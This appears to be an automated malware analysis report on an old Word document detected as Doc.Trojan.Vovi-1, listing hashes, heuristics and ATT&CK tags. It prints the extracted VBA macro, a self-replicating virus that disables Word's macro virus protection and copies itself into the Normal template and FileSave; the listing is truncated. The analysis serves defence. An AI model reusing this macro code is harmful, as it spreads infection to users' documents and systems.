Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 161dcb32fa0ee2df…

MALICIOUS

Office (OLE)

Size: 35.0 KB
Created: 1997-07-07 09:37:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 00609763fe7accb9319bd6b22688fd38
SHA-1: 311022d913225a39eff8b032f4362b6d1f7c26e4
SHA-256: 161dcb32fa0ee2dffb1d74fe04059a0e4f6f26f348566a7740e264eff8914d65
Risk Score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a WordBasic AutoOpen macro. This macro attempts to copy itself into the Normal template and modify the template's behavior, likely to establish persistence or evade detection. The legacy WordBasic macros and the AutoOpen entry point are strong indicators of older malware techniques.

Heuristics 4

  • ClamAV: Doc.Trojan.Vovi-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Vovi-1
  • VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6823 bytes
SHA-256: 7d52492fb81bf14bb9447b3cdbd020721d201c0123e8bbaa73f26a1f87b09c4b
Detection
ClamAV: Doc.Trojan.Vovi-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

    On Error GoTo Err
    GoTo Cont
    
Err:
    Exit Sub
    
Cont:
    For Each comp In NormalTemplate.VBProject.VBComponents
'        MsgBox comp.Name
        If comp.Name = "NewMacros" Then
            foundNM = True
            Exit For
        End If
    Next comp
    
    If foundNM = False Then
        NormalTemplate.VBProject.VBComponents.Add (1)
        For Each comp In NormalTemplate.VBProject.VBComponents
'            MsgBox comp.Name
'            MsgBox comp.Type
            If comp.CodeModule.CountOfLines = 0 Then
                If comp.Type = 1 Then
                    comp.Name = "NewMacros"
                    Exit For
                End If
            End If
        Next comp
    End If
    
    If comp.CodeModule.Find("VoviusFirstMacroVirus", _
                1, 1, comp.CodeModule.CountOfLines, 1) = True Then
'        MsgBox "Virus was found"
        Exit Sub
    End If
    
    Options.VirusProtection = False
    If comp.CodeModule.Find("FileSave", _
                1, 1, comp.CodeModule.CountOfLines, 1) = False Then
'        MsgBox "Not Found FileSave. Adding."
        i = comp.CodeModule.CountOfLines
        j = comp.CodeModule.InsertLines(i + 1, "Sub FileSave" _
                + Chr(10) + "End Sub")
 '       i = comp.CodeModule.ProcStartLine("FileSave", vbext_pk_Proc)
'        MsgBox comp.CodeModule.Lines(i, 10)
        fs = 0
    Else
'        MsgBox "Found FileSave"
        fs = 2
    End If
    
 '   MsgBox "Writing FileS To FileSave"
    For Each thiscomp In ActiveDocument.VBProject.VBComponents
 '       MsgBox thiscomp.Name
        If thiscomp.Name = "NewMacros" Then
            Exit For
        End If
    Next thiscomp
    
    i = comp.CodeModule.ProcStartLine("FileSave", vbext_pk_Proc)
    thisi = thiscomp.CodeModule.ProcStartLine("FileS", vbext_pk_Proc)
    thiscount = thiscomp.CodeModule.ProcCountLines("FileS", vbext_pk_Proc)
    j = comp.CodeModule.InsertLines(i + 1, _
                thiscomp.CodeModule.Lines(thisi + 1, thiscount - 2 - fs))
'    MsgBox comp.CodeModule.Lines(i, 10)
        
'    MsgBox "Writing FileS To FileS"
    i = comp.CodeModule.CountOfLines
    thisi = thiscomp.CodeModule.ProcStartLine("FileS", vbext_pk_Proc)
    thiscount = thiscomp.CodeModule.ProcCountLines("FileS", vbext_pk_Proc)
    j = comp.CodeModule.InsertLines(i + 1, _
                thiscomp.CodeModule.Lines(thisi, thiscount))
'    MsgBox comp.CodeModule.Lines(i + 1, 10)
    
'    MsgBox "Adding AutoOp"
    i = comp.CodeModule.CountOfLines
    j = comp.CodeModule.InsertLines(i, "Sub AutoOp" _
                + Chr(10) + "End Sub")
 '   i = comp.CodeModule.ProcStartLine("AutoOp", vbext_pk_Proc)
'    MsgBox comp.CodeModule.Lines(i, 10)
    
'    MsgBox "Writing AutoOpen To AutoOp"
    i = comp.CodeModule.ProcStartLine("AutoOp", vbext_pk_Proc)
    thisi = thiscomp.CodeModule.ProcStartLine("AutoOpen", vbext_pk_Proc)
    thiscount = thiscomp.CodeModule.ProcCountLines("AutoOpen", vbext_pk_Proc)
    j = comp.CodeModule.InsertLines(i + 1, _
                thiscomp.CodeModule.Lines(thisi + 1, thiscount - 2))
'    MsgBox comp.CodeModule.Lines(i, 10)
    
'    MsgBox "Writing label."
    i = comp.CodeModule.CountOfLines
    j = comp.CodeModule.InsertLines(i + 1, "Sub VoviusFirstMacroVirus" _
                    + Chr(10) + Chr(10) + "End Sub")
'    i = comp.CodeModule.ProcStartLine("VoviusFirstMacroVirus", vbext_pk_Proc)
 '   MsgBox comp.CodeModule.Lines(i, 10)
End Sub
Sub FileS()

    On Error GoTo Err
    GoTo Cont
Err:
    Exit Sub
    
Cont:
    For Each comp In ActiveDocument.VBProject.VBComponents
'        MsgBox comp.Name
        If comp.Name = "NewMacros" Then
            foundNM = True
            Exit 
... (truncated)